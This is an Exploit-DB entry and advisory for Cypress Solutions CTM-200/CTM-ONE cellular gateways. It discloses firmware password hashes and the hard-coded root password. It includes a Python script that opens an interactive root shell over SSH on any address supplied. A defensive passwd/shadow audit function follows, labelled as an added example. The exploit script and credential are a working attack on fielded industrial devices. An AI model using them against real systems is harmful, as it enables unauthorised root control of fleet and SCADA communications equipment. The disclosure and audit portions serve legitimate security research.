Cypress Solutions CTM-200/CTM-ONE – Hard-coded Credentials Remote Root (Telnet/SSH)

  • Author: LiquidWorm
    Date: 2021-10-13
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50407/
  • # Exploit Title: Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
    # Date: 21.09.2021
    # Exploit Author: LiquidWorm
    # Vendor Homepage: https://www.cypress.bc.ca
    
    #!/usr/bin/env python3
    #
    #
    # Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)
    #
    #
    # Vendor: Cypress Solutions Inc.
    # Product web page: https://www.cypress.bc.ca
    # Affected version: CTM-ONE (1.3.6-latest)
    #                   CTM-ONE (1.3.1)
    #                   CTM-ONE (1.1.9)
    #                   CTM200 (2.7.1.5659-latest)
    #                   CTM200 (2.0.5.3356-184)
    #
    # Summary: CTM-200 is the industrial cellular wireless gateway for fixed
    # and mobile applications. The CTM-200 is a Linux based platform powered
    # by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
    # features make the CTM-200 ideal for mobile fleet applications or fixed
    # site office and SCADA communications.
    #
    # CTM-ONE is the industrial LTE cellular wireless gateway for mobile and
    # fixed applications. CTM-ONE is your next generation of gateway for fleet
    # tracking and fixed sites.
    #
    # ======================================================================
    # CTM-200
    # /var/config/passwd:
    # -------------------
    # root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
    # admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
    # nobody:*:65534:65534:nobody:/var:/bin/false
    # daemon:*:65534:65534:daemon:/var:/bin/false
    #
    # /var/config/advanced.ini:
    # -------------------------
    # 0
    # 0
    # Chameleon
    # 0,0,0,0,0,255
    # 0,0,0,0,0,255
    # 0,0,0,0,0,255
    # 0,0,0,0,0,255
    # 0,0,0,0,0,255
    # 0,0,0,0,0,255
    #
    #
    # CTM-ONE
    # /etc/shadow:
    # ------------
    # admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
    # root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
    # daemon:*:16009:0:99999:7:::
    # bin:*:16009:0:99999:7:::
    # sys:*:16009:0:99999:7:::
    # ftp:*:16009:0:99999:7:::
    # nobody:*:16009:0:99999:7:::
    # messagebus:!:16009:0:99999:7:::
    # ======================================================================
    # 
    # Desc: The CTM-200 and CTM-ONE ship hard-coded credentials within
    # their Linux distribution image. This weakness can expose resources
    # or functionality to unintended actors, giving attackers access to
    # sensitive information and the ability to execute arbitrary code.
    #
    # Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)
    #            GNU/Linux 2.6.32.25 (arm4tl)
    #            lighttpd/1.4.39
    #            BusyBox v1.24.1
    #            BusyBox v1.15.3
    #
    #
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    # @zeroscience
    #
    #
    # Advisory ID: ZSL-2021-5686
    # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php
    #
    #
    # 21.09.2021
    #
    
    import sys
    import paramiko
    
    bnr='''
    o ┌─┐┌┬┐┌─┐┌─┐┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬┬ o
    │ │││││ ┬├─┤├┬┘│ ││ │ │ └─┐├─┤├┤ ││
    o └─┘┴ ┴└─┘┴ ┴┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o
    '''
    print(bnr)
    
    if len(sys.argv)<2:
        print('Put an IP.')
        sys.exit()
    
    adrs=sys.argv[1]##
    unme='root'#admin#
    pwrd='Chameleon'##
    
    rsh=paramiko.SSHClient()
    rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    rsh.connect(adrs,username=unme,password=pwrd)
    
    while 1:
        cmnd=input('# ')
        if cmnd=='exit':
            break
        stdin,stdout,stderr=rsh.exec_command(cmnd)
        stdin.close()
        print(str(stdout.read().decode()))
    rsh.close()
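
The CTM-200 passwd listing in the advisory above shows what a firmware image review should catch before release: two UID 0 accounts carrying the same salted MD5-crypt hash. The audit below is an added example, not part of the original advisory or the vendor's code; the function name `audit_accounts` and its finding strings are assumptions, and the sample input is the passwd excerpt quoted above.

```python
from collections import defaultdict

# Added example: audit_accounts and its finding strings are names made up here.
# Sample input: the CTM-200 /var/config/passwd lines quoted in the advisory.
SAMPLE_PASSWD = """\
root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
daemon:*:65534:65534:daemon:/var:/bin/false
"""

# crypt(3) scheme ids considered obsolete; "des" stands for a hash with no $id$ prefix.
WEAK_SCHEMES = {"1": "MD5-crypt", "des": "DES-crypt"}


def audit_accounts(text):
    """Return sorted (account, finding) tuples for passwd- or shadow-format text."""
    findings = []
    by_hash = defaultdict(list)
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 2 or not fields[0] or fields[0].startswith("#"):
            continue
        name, pw = fields[0], fields[1]
        # passwd lines have 7 fields with the UID third; shadow lines carry no UID.
        if len(fields) == 7 and fields[2] == "0" and name != "root":
            findings.append((name, "UID 0 account besides root"))
        if pw == "":
            findings.append((name, "empty password field"))
            continue
        if pw == "x" or pw[0] in "*!":
            continue  # hash lives in shadow, or the account is locked
        findings.append((name, "password hash shipped in image"))
        parts = pw.split("$")
        scheme = parts[1] if pw.startswith("$") and len(parts) > 2 else "des"
        if scheme in WEAK_SCHEMES:
            findings.append((name, "weak hash scheme: " + WEAK_SCHEMES[scheme]))
        by_hash[pw].append(name)
    # An identical salt and hash on several accounts means one shared password.
    for names in by_hash.values():
        for name in names:
            others = [n for n in names if n != name]
            if others:
                findings.append((name, "same salt and hash as " + ", ".join(others)))
    return sorted(findings)


if __name__ == "__main__":
    for account, finding in audit_accounts(SAMPLE_PASSWD):
        print(f"{account}: {finding}")
```

Run against the passwd and shadow files of an unpacked image, any "password hash shipped in image" finding marks a credential that is identical on every unit until it is changed per device.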